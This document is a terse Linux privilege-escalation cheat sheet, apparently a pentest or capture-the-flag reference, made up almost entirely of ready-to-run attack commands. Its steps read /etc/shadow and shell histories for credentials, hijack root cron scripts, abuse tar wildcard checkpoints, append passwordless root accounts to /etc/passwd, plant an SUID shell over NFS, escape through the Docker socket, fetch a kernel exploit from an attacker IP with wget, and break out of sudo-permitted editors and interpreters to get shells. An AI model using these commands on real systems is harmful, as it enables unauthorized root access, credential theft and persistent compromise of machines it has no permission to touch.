-> Basic System Enumeration
uname -a
hostname
lscpu
ls /home
ls /var/www/html
ls /var/www/
ps aux | grep root
netstat -tulpn
ps -aux | grep root | grep mysql
ifconfig
find . -type f -exec grep -i -I "PASSWORD=" {} /dev/null \;
locate pass | more-> Get system distribution and version
cat /etc/*-release-> Get kernel version
cat /proc/version
uname -a-> View variable environments
env
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.zshrc-> View user command history
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history-> List running processes
ps aux-> Service Footprints
watch -n 1 "ps -aux | grep pass"sudo tcpdump -i lo -A | grep "pass"-> View interfaces and network information
ifconfig
ip addr
ss -anp-> View all active TCP connections and the TCP and UDP ports the host is listening on.
netstat -ant-> Get DNS resolver and hosts mapped to an IP
cat /etc/resolv.conf
cat /etc/hosts-> Get system user, group and password information
cat /etc/passwd
cat /etc/shadow-> psql terminal as postgres user
su postgres
psql-> list the databases
\list-> select the database
\c <database>-> list the tables
\d-> dump
select * from <table>;-> read files
CREATE TABLE demo(t text);
COPY demo from '<filename>';
SELECT * FROM demo;-> access database
sqlite3 <database.db>-> list the tables
.tables-> dump
select * from <table>;mysql -u root -h localhost -p-> list the databases
show databases;-> select the database
use <database>;-> list the tables
show tables;-> dump
SELECT * FROM <table>;-> Perform code review on web server files (/var/www/html); -> Check log files for credentials;
-> Enumeration
cat /var/log/cron.log
cat /etc/crontabcontab -l
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weeklyls -lah /etc/cron*
grep "CRON" /var/log/syslogcrontab -l
sudo crontab -l-> Exploitation
echo "chmod +s /bin/bash" >> script.shcat /etc/crontab-> Output like this
* * * * * root /var/www/html/file.py-> Modify file
cd /var/www/html/
vi file.py-> Import lib
import os
os.system("chmod +s /bin/bash")-> Listing "/etc/crontab" file
* * * * * root /usr/bin/local/file.sh-> Output
#!/bin/bash
cd /var/www/html/
tar czf /tmp/file2.tar.gz *
-> Exploit
cd /var/www/html/
echo "#!/bin/bash" > priv.sh
echo "chmod +s /bin/bash" >> priv.sh
chmod +x priv.sh
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=sh\ priv.sh
-> Enumeration
find / -perm -u=s -type f 2>/dev/nullor
id
find / -perm -u=s -type f -group <group> 2>/dev/null-> Example
find / -perm -u=s -type f 2>/dev/null/usr/bin/find
/usr/bin/chsh
/usr/bin/passwdflag-> Permitions
ls -l /usr/bin/passwdflag-rwsr-xr-x 1 root root 68574 Jan 5 18:00 /usr/bin/passwdflag
-> Searching strings
strings /usr/bin/passwdflag | grep "pass"-> Exploitation
-> Enumeration
getcap -r / 2>/dev/null-> Exploitation
sudo -lor
cat /etc/sudoers-> Exploitation
sudo -u <username> <command>-> Enumeration
ls -la /etc/passwd
ls -la /etc/shadow-> Exploitation
echo "user:$(openssl passwd password123):0:0:root:/root:/usr/bin/bash" >> /etc/passwd-> Enumeration
find / -writable -type d 2>/dev/null-> If you have write permission on this files
/etc/passwd
/etc/shadow
/etc/sudoers-> passwd file
echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
su - root2
id && whoamior
openssl passwd -1 -salt mysalt NewP@ssword1
Copy output
echo "root2:<output>:0:0:root:/root:/bin/bash" >> /etc/passwd
Replace <output> with the copied output
su root2
id && whoami
-> Detection - VM Owned
cat /etc/exports-> Viewing nfs directories with access - Attacker VM
showmount -e <ip>
-> Get nfs version - Attacker VM
rpcinfo <ip>-> Mount - Attacker VM
mkdir /tmp/1
mount -o rw,vers=2 <ip>:/<nfs_directory> /tmp/1-> Creating and compiling file for privesc - Attacker VM
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x-> Exploitation - VM Owned
/tmp/x
idsudo -u#-1 /bin/bash-> Search the socket
find / -name docker.sock 2>/dev/null-> list images
docker images-> Exploitation
docker run -it -v /:/host/ <image>:<tag> chroot /host/ bash-> Get information
cat /etc/issue
uname -r
arch-> Validate softwares
whereis gcc
whereis python
whereis curl
whereis wget-> Searching public exploit
searchsploit "linux kernel 5.9"
searchsploit -m 50808.c-> Find file has a SUID permission
find / -perm -u=s -type f 2>/dev/null-> Move to target and compile
cd /tmp
wget http://<IP>/50808.c
chmod +x 50808.c
gcc 50808.c -o 50808-> Exploit
./50808 <SUID-FILE>sudo -l
sudo -u user1 vim
:r /home/user1/file.txt
:!/bin/bash
uid=1001(user1) gid=1001(user1) groups=1001(user1)sudo -l
sudo -u user1 less /home/user1/file.txt
sudo -u user1 less /etc/passwd
/home/user1/file.txt
!/bin/bashsudo -u user1 awk '{print $0}' /home/user1/file.txt
sudo -u user1 awk '{system("/bin/bash")}'sudo -u user1 perl -e 'print `cat /home/user1/file.txt`'
sudo -u user1 perl -e '`/bin/bash`'sudo -u user1 python
import os
os.system('cat /home/user1/file.txt')
os.system('/bin/bash')sudo -u user1 /usr/bin/ruby -e'puts `cat /home/user1/key.txt`'
/usr/bin/ruby -e 'require "irb" ; IRB.start(__FILE__)'sudo -u user1 node -e 'var exec = require("child_process").exec;exec("cat /home/user1/key.txt", function (error, stdOut, stdErr) {console.log(stdOut);});'
sudo -u user1 node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'-> Linpeas
./linpeas.sh-> pspy (unprivileged Linux process snooping)
./pspy64-> linux-exploit-suggester
./linux-exploit-suggester.shor
./linux-exploit-suiggester.sh --uname <uname-string>-> Unix Privesc Check
./unix-privesc-check